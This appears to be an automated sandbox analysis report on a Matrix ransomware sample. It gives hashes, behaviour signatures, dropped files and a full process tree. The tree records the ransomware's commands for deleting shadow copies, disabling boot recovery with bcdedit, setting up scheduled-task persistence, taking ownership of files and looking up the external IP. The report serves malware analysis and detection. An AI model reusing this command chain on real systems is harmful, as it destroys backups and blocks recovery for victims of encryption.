Analysis

  • max time kernel
    151s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    03-11-2022 12:57

General

  • Target

    907636b28d162f7110b067a8178fa38c.exe

  • Size

    1.2MB

  • MD5

    907636b28d162f7110b067a8178fa38c

  • SHA1

    048ae4691fe267e7c8d9eda5361663593747142a

  • SHA256

    6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

  • SHA512

    501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

  • SSDEEP

    24576:R/SA+2lraRrjSJR5ezmT1dM9tZBb5t+wb8fq/81mkvfW:3XlayIsy81hvf

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe
    "C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe"
    1⤵
    • Matrix Ransomware
    • Modifies extensions of user files
    • Loads dropped DLL
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1824
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe" "C:\Users\Admin\AppData\Local\Temp\NWYHhHYv.exe"
      2⤵
        PID:1984
      • C:\Users\Admin\AppData\Local\Temp\NWYHhHYv.exe
        "C:\Users\Admin\AppData\Local\Temp\NWYHhHYv.exe" -n
        2⤵
        • Executes dropped EXE
        PID:1940
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\adUQEWSg.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:436
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:752
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\rNwjBuHZ.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1112
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\rNwjBuHZ.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:2032
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:1148
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
            • Matrix Ransomware
            PID:1712
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\w5dCATEj.vbs"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1672
          • C:\Windows\SysWOW64\wscript.exe
            wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\w5dCATEj.vbs"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:940
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wADvx861.bat" /sc minute /mo 5 /RL HIGHEST /F
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1312
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wADvx861.bat" /sc minute /mo 5 /RL HIGHEST /F
                5⤵
                • Creates scheduled task(s)
                PID:1564
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:628
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /Run /I /tn DSHCA
                5⤵
                  PID:1988
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\ghxOWIYe.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1308
            • C:\Windows\SysWOW64\attrib.exe
              attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
              3⤵
              • Views/modifies file attributes
              PID:1660
            • C:\Windows\SysWOW64\cacls.exe
              cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
              3⤵
                PID:2032
              • C:\Windows\SysWOW64\takeown.exe
                takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
                3⤵
                • Modifies file permissions
                PID:1252
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c iOwlD4KZ.exe -accepteula "DefaultID.pdf" -nobanner
                3⤵
                • Loads dropped DLL
                PID:1912
                • C:\Users\Admin\AppData\Local\Temp\iOwlD4KZ.exe
                  iOwlD4KZ.exe -accepteula "DefaultID.pdf" -nobanner
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:1620
                  • C:\Users\Admin\AppData\Local\Temp\iOwlD4KZ64.exe
                    iOwlD4KZ.exe -accepteula "DefaultID.pdf" -nobanner
                    5⤵
                    • Drops file in Drivers directory
                    • Executes dropped EXE
                    • Sets service image path in registry
                    • Enumerates connected drives
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: LoadsDriver
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1460
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {DCE71A13-7F60-41A9-8408-5C9D9CA2DA5D} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:1976
            • C:\Windows\SYSTEM32\cmd.exe
              C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\wADvx861.bat"
              2⤵
                PID:1648
                • C:\Windows\system32\vssadmin.exe
                  vssadmin Delete Shadows /All /Quiet
                  3⤵
                  • Interacts with shadow copies
                  PID:1520
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic SHADOWCOPY DELETE
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1904
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
                  3⤵
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1956
                  • C:\Windows\system32\vssadmin.exe
                    "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                    4⤵
                    • Interacts with shadow copies
                    PID:1144
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /set {default} recoveryenabled No
                  3⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1224
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  3⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1764
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN DSHCA /F
                  3⤵
                    PID:1548
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:964

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\NWYHhHYv.exe

                Filesize

                1.2MB

                MD5

                907636b28d162f7110b067a8178fa38c

                SHA1

                048ae4691fe267e7c8d9eda5361663593747142a

                SHA256

                6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

                SHA512

                501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

              • C:\Users\Admin\AppData\Local\Temp\NWYHhHYv.exe

                Filesize

                1.2MB

                MD5

                907636b28d162f7110b067a8178fa38c

                SHA1

                048ae4691fe267e7c8d9eda5361663593747142a

                SHA256

                6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

                SHA512

                501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

              • C:\Users\Admin\AppData\Local\Temp\adUQEWSg.txt

                Filesize

                14B

                MD5

                325fab5962cc5892f8bc81bb9be6a83c

                SHA1

                d781a63073eb8df2ddc8392bdadfafa3ccb65dd3

                SHA256

                6a44791e6dadf62ea306230d75f7e4119a9d71ecc31a9965719c4371cb5515b7

                SHA512

                c60ac52cd6a37b513bd993a3ac6187b37c9cca8f1568d2a5c2594d02615d89f1dcce112466cc03f9c207466fc01b359b7787aa629991130e2cd96e501a093379

              • C:\Users\Admin\AppData\Local\Temp\ghxOWIYe.bat

                Filesize

                246B

                MD5

                6f18bfca2f6b54479135c75be39932c6

                SHA1

                55926f41201d18d6610fe9c72882a781d6a17bac

                SHA256

                5970694e003a654ef00ffa05f8c015a949badc79756359f7a6b4058f779bfaf4

                SHA512

                079a4ca3a14d303ad10f9836e7a39904ce7e790c3bda559f67053416391dfd7d4ec3c36d83308aab2e9d2c97b8d9ac61f2db4d257d33fe9d0067a5f7eb3b87b6

              • C:\Users\Admin\AppData\Local\Temp\iOwlD4KZ.exe

                Filesize

                181KB

                MD5

                2f5b509929165fc13ceab9393c3b911d

                SHA1

                b016316132a6a277c5d8a4d7f3d6e2c769984052

                SHA256

                0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                SHA512

                c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

              • C:\Users\Admin\AppData\Local\Temp\iOwlD4KZ.exe

                Filesize

                181KB

                MD5

                2f5b509929165fc13ceab9393c3b911d

                SHA1

                b016316132a6a277c5d8a4d7f3d6e2c769984052

                SHA256

                0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                SHA512

                c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

              • C:\Users\Admin\AppData\Local\Temp\iOwlD4KZ64.exe

                Filesize

                221KB

                MD5

                3026bc2448763d5a9862d864b97288ff

                SHA1

                7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                SHA256

                7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                SHA512

                d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

              • C:\Users\Admin\AppData\Roaming\w5dCATEj.vbs

                Filesize

                260B

                MD5

                e1c3861f074fb4fb2b507d9b5c6f5d61

                SHA1

                0783a55d0d56ae5b92d1a4eae2223fee22c3f58d

                SHA256

                12e1bf618a32cbff2e91f6eec8b2cbd1591c6a655f2cb9f3a2e0829d8a54c06f

                SHA512

                5defac3d62f26b34d6c756d22acd34eee826d2374d33af44c9cf59d1466098dec6395d95045101f633ebf7eefa536036bb300ef2019f407644e3f67bd0338542

              • C:\Users\Admin\AppData\Roaming\wADvx861.bat

                Filesize

                415B

                MD5

                831afb00c9a3bc5de7d3f6625eeb3a71

                SHA1

                2de7b837cedc38ce7e04c44bd8abc99d691cd8ae

                SHA256

                2fe612320ebf2548fe25db8004796e3eeffa649610af62f90d44959f1c5cf05e

                SHA512

                ba601b874a2e017c272e789c64fe92491ae24a3baf08ec044d800ea66c5896a41b6eb7cefc5e76fb4e43b4b41a7f0ef2c5699685a90ccdf4efc6fda53054b429

              • \Users\Admin\AppData\Local\Temp\NWYHhHYv.exe

                Filesize

                1.2MB

                MD5

                907636b28d162f7110b067a8178fa38c

                SHA1

                048ae4691fe267e7c8d9eda5361663593747142a

                SHA256

                6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

                SHA512

                501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

              • \Users\Admin\AppData\Local\Temp\NWYHhHYv.exe

                Filesize

                1.2MB

                MD5

                907636b28d162f7110b067a8178fa38c

                SHA1

                048ae4691fe267e7c8d9eda5361663593747142a

                SHA256

                6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

                SHA512

                501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

              • \Users\Admin\AppData\Local\Temp\iOwlD4KZ.exe

                Filesize

                181KB

                MD5

                2f5b509929165fc13ceab9393c3b911d

                SHA1

                b016316132a6a277c5d8a4d7f3d6e2c769984052

                SHA256

                0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                SHA512

                c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

              • \Users\Admin\AppData\Local\Temp\iOwlD4KZ64.exe

                Filesize

                221KB

                MD5

                3026bc2448763d5a9862d864b97288ff

                SHA1

                7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                SHA256

                7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                SHA512

                d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

              • memory/752-66-0x0000000072D80000-0x000000007332B000-memory.dmp

                Filesize

                5.7MB

              • memory/752-65-0x0000000072D80000-0x000000007332B000-memory.dmp

                Filesize

                5.7MB

              • memory/1620-98-0x0000000000400000-0x0000000000477000-memory.dmp

                Filesize

                476KB

              • memory/1620-92-0x0000000000400000-0x0000000000477000-memory.dmp

                Filesize

                476KB

              • memory/1824-54-0x0000000075571000-0x0000000075573000-memory.dmp

                Filesize

                8KB

              • memory/1912-97-0x0000000000400000-0x0000000000477000-memory.dmp

                Filesize

                476KB

              • memory/1912-91-0x0000000000400000-0x0000000000477000-memory.dmp

                Filesize

                476KB

              • memory/1956-109-0x000000000252B000-0x000000000254A000-memory.dmp

                Filesize

                124KB

              • memory/1956-103-0x000007FEFB5C1000-0x000007FEFB5C3000-memory.dmp

                Filesize

                8KB

              • memory/1956-104-0x000007FEF43B0000-0x000007FEF4DD3000-memory.dmp

                Filesize

                10.1MB

              • memory/1956-106-0x0000000002524000-0x0000000002527000-memory.dmp

                Filesize

                12KB

              • memory/1956-105-0x000007FEF3790000-0x000007FEF42ED000-memory.dmp

                Filesize

                11.4MB

              • memory/1956-108-0x0000000002524000-0x0000000002527000-memory.dmp

                Filesize

                12KB